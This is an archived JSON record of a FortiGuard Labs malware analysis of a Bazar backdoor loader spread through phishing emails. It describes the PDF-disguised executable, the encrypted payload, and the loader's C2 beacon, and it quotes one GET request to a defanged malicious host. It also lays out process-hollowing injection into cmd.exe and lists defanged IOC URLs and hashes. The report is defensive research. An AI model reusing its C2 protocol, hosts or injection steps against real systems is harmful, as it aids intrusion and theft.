{
	"id": "9bd6bf20-dc41-4e1f-a1a5-fad8822124cc",
	"created_at": "2026-04-06T00:09:49.204227Z",
	"updated_at": "2026-04-10T03:21:57.937385Z",
	"deleted_at": null,
	"sha1_hash": "1acd62c26cf25999b9926b82098980859db50175",
	"title": "New Bazar Trojan Variant is Being Spread in Recent Phishing Campaign – Part I | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2057242,
	"plain_text": "New Bazar Trojan Variant is Being Spread in Recent Phishing Campaign\r\n– Part I | FortiGuard Labs\r\nBy Xiaopeng Zhang\r\nPublished: 2021-02-12 · Archived: 2026-04-05 20:16:40 UTC\r\nFortiGuard Labs Threat Research Report\r\nAffected platforms: Microsoft Windows  \r\nImpacted parties:    Windows Users\r\nImpact:                     Control and Collect sensitive information from victim’s device, as well as delivering other malware.\r\nSeverity level:           Critical\r\nBazar (which has been classified as the Team9 malware family being developed by the group behind Trickbot) is a backdoor\r\nTrojan designed to target a device, collect sensitive information, control the system via commands, and deliver malware.\r\nLast year, it was observed delivering the TrickBot malware.\r\nFortiGuard Labs recently noticed a suspicious email through the SPAM monitoring system. This email was designed to\r\nentice a victim into opening a web page to download an executable file. Additional research on this executable file found\r\nthat it is a new variant of Bazar. In this post you can expect to learn what new techniques this Bazar uses to perform anti-analysis, how it communicates with its C2 server, what sensitive data it is able to collect from the victim’s device and how it\r\nis able to deliver other malware onto the victim’s system.\r\nPhishing Email and Download Page\r\nTo validate our assessment, we captured some of Bazar’s previous phishing emails and their content are similar. They lure\r\nthe recipient into opening a webpage to view a pdf version of a fake bonus report, fake customer complaint report, or fake\r\nbilling statement, etc. You can see two examples in the following Figures, which were captured on Jan 20 and Jan 27, 2021.\r\nFigure 1.1 Bazar phishing email captured on Jan 20, 2021\r\nhttps://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I\r\nPage 1 of 7\n\nFigure 1.2 Bazar phishing email on Jan 27, 2021\r\nOnce the victim clicks any hyperlink in the email, it brings the victim to a malicious webpage, as shown in Figure 1.3.\r\nFigure 1.3 Webpage that downloads the Bazar malware\r\nThere are three hyperlinks, circled on the webpage image above, that all pointing to the same download link. One instance\r\nof the download hyperlinks looks like this:\r\nhttps[:]//doc-14-6g-docs[.]googleusercontent.com/docs/securesc/m4jlrke7n9hladu0avuh39vorb58jrve/fgl9fo0g0p5o35at5vboiccqq552hmqf/1611168150000/16223329070176\r\n8ISzpp4XoG-jfSs?\r\ne=download\u0026authuser=0\u0026nonce=nvmpahs236rou\u0026user=11832846407481787782\u0026hash=5ctf3a9bet7iv3njj965vh0c16pumigi\r\nDownloaded Bazar Loader\r\nThe downloaded file (Priview_report20-01[.]exe) is an executable file that uses a PDF document-like icon to deceive the\r\nintended victim. By default, Windows hides the actual extension (for example, “.exe”). \r\nFigure 2.1 shows a quick analysis of the file. The left side of the image shows what the victim sees, and the right side shows\r\nwhat the researchers see in a PE analysis tool. (PE, or Portable Executable, is the native format of executable binaries\r\n[DLLs, drivers and programs] for the Microsoft Windows® 32-bit operating systems.)\r\nhttps://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I\r\nPage 2 of 7\n\nFigure 2.1 The downloaded Bazar loader in an analysis tool\r\nThe victim may assume the file is a real PDF document and double click on it to open the “report” without realizing that an\r\nexecutable file is being run in the background. \r\nThe downloaded executable file is recognized as a 64-bit file in the analysis tool, which means it is only able to execute on\r\n64-bit Microsoft Windows Operating Systems.\r\nAfter analyzing this file, I realized this file is a loader of Bazar. \r\nOnce the Bazar loader starts, an encrypted Resource that hides in the “Font Directory” with the ID “339” (hex 153H) is\r\nloaded into its memory. In Figure 2.2 you can see the Resource data shown in an analysis tool.\r\nFigure 2.2. Encrypted Resource 339 of Bazar loader\r\nDecrypting the Resource data uncovers a piece of ASM (assembly language) code and a PE file. This ASM code, called by\r\nthe Bazar loader, dynamically deploys the PE file into memory and executes it. Figure 2.3 is a screenshot of a debugger,\r\nshowing where the ASM code was about to call the OEP (Original Entry Point) of the deployed PE file. This PE file is the\r\nreal Bazar loader.\r\nhttps://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I\r\nPage 3 of 7\n\nFigure 2.3. Calling the OEP of the deployed PE file\r\nDeeper Dive into the Bazar Loader\r\nThe real Bazar loader then initiates communication with its C2 server. The host and URL strings are decrypted from constant\r\ndata in that stack.\r\nFigure 3.1. A display of the decrypted host string of the C2 server\r\nFigure 3.1 above shows the just decrypted C2 host string with the port number (englewoodcarwashh[.]us:443) in the\r\nmemory sub-window. It later calls the API getaddrinfo(C2_host_string) to obtain the IP address of the C2 server.\r\nIt sends a GET request with the URL “/cgi-bin/req5” to its C2 server using the SSL protocol. Figure 3.2 is a screenshot of a\r\ndebugger showing the moment it was about to call the API EncryptMessage() to encrypt the entire GET request.\r\nhttps://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I\r\nPage 4 of 7\n\nFigure 3.2. An encrypted packet sent to the C2 server\r\nI copied the packet below for a clearer view:\r\nGET /cgi-bin/req5 HTTP/1.1\r\nHost: englewoodcarwashh[.]us\r\nUser-Agent: user_agent\r\nDate: Wed, 20 Jan 2021 21:05:11 GMT\r\nrvpoft: z3qTFLIkBrYVD3igIKy1kAS99rBL0V35k8NKFUG1dQGVw4ICpFV8y9cAiVS%2FAu6RTpaHgZRVuWMsnLVhpTZaRMdnvCDvJrOqKhawD\r\nConnection: Keep-Alive \r\nYou may have noticed that the value of “rvpoft” is base64 encoded. It was a hash of the  “Date:” value (“Wed, 20 Jan 2021\r\n21:05:11 GMT”). By calculating the hash of “Date:” and comparing it with the hash value that “rvpoft” carries at the C2\r\nserver, it is able to verify if the packet is from its true client.\r\nFigure 3.3. The decrypted Bazar payload returned from the C2 server\r\nhttps://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I\r\nPage 5 of 7\n\nOnce it passes packet verification, the C2 server replies with an encrypted Bazar payload to the client (Bazar loader). This is\r\ndecrypted in the API function BCryptDecrypt() that is called by the Bazar loader. Figure 3.3, above, shows the just-decrypted Bazar payload PE file in the memory sub-window at the bottom.\r\nThe payload file is an EXE file, which will be injected into a newly-created “cmd.exe” process to hide its real process from\r\nbeing noticed by the victim. To do this, the Bazar loader calls API CreateProcessA() to create a “cmd” process with a\r\nCreateFlags of value “0x80014” that is a combination of “EXTENDED_STARTUPINFO_PRESENT,\r\nCREATE_NEW_CONSOLE, and CREATE_SUSPENDED”. Refer to Figure 3.4, below, for more details.\r\nFigure 3.4. Creating the “cmd.exe” process by calling the API CreateProcessA()\r\nTo inject the Bazar payload into the newly-created “cmd.exe” process and execute it, it needs to call some relevant APIs,\r\nlike NtGetContextThread(), VirtualAllocEx(), NtUnmapViewOfSection(), NtWriteVirtualMemory(),\r\nZwSetContextThread(), and ZwResumeThread().\r\nConclusion\r\nThis is part I of our analysis of this new Bazar variant. In this post, I explained how a Bazar loader was spread in a phishing\r\ncampaign. I showed how the Bazar loader communicates with its C2 server to download the Bazar payload. I also presented\r\nhow the payload file is deployed in a newly-created “cmd.exe” process.\r\nI will provide an analysis of the Bazar payload file running in “cmd.exe” in part II of this analysis. In that report you will\r\nlearn how Bazar communicates to its C2 server and what actions Bazar can perform on a victim’s device via commands\r\nreceived from its C2 server. \r\nFortinet Protections\r\nFortinet customers are already protected from this Bazar variant with FortiGuard’s Web Filtering and AntiVirus services as\r\nfollows:\r\nThe Bazar loader download URLs are rated as \"Malicious Websites\" by the FortiGuard Web Filtering service.\r\nThe downloaded files are detected as \"W64/Bazar.CFI!tr\" and blocked by the FortiGuard AntiVirus service.\r\nThe FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient and FortiEDR. The Fortinet AntiVirus\r\nengine is a part of each of those solutions. As a result, customers who have these products with up-to-date protections are\r\nprotected.\r\nWe also suggest our readers to go through the free NSE training -- NSE 1 – Information Security Awareness, which has a\r\nmodule on Internet threats designed to help end users learn how to identify and protect themselves from phishing attacks.\r\nIOCs:\r\nURLs\r\nhxxps[:]//complaintsreport2020[.]gr8[.]com/\r\nhxxps[:]//app[.]getresponse[.]com/lpc_unpublish.html\r\nhxxps[:]//englewoodcarwashh[.]us:443/cgi-bin/req5\r\nSample SHA-256\r\n[Preview_report20-01.exe]\r\n0BFB64DFF37DD50449AF75EC204F0B4981AC3B16790458F6A492C7B27905A9A7\r\nhttps://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I\r\nPage 6 of 7\n\n[Print-report27-01.exe]\r\n6E6C0EBC1BB2D99CE358612572F4BCF52578527EEEF6629FFCE81B35F5FA1A99\r\nReferences:\r\nhttps://malpedia.caad.fkie.fraunhofer.de/details/win.bazarbackdoor\r\nLearn more about FortiGuard Labs threat research and the FortiGuard Security Subscriptions and Services portfolio.  \r\nLearn more about Fortinet’s free cybersecurity training initiative or about the Fortinet NSE Training program, Security\r\nAcademy program, and Veterans program.\r\nSource: https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I\r\nhttps://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I"
	],
	"report_names": [
		"new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I"
	],
	"threat_actors": [],
	"ts_created_at": 1775434189,
	"ts_updated_at": 1775791317,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1acd62c26cf25999b9926b82098980859db50175.pdf",
		"text": "https://archive.orkl.eu/1acd62c26cf25999b9926b82098980859db50175.txt",
		"img": "https://archive.orkl.eu/1acd62c26cf25999b9926b82098980859db50175.jpg"
	}
}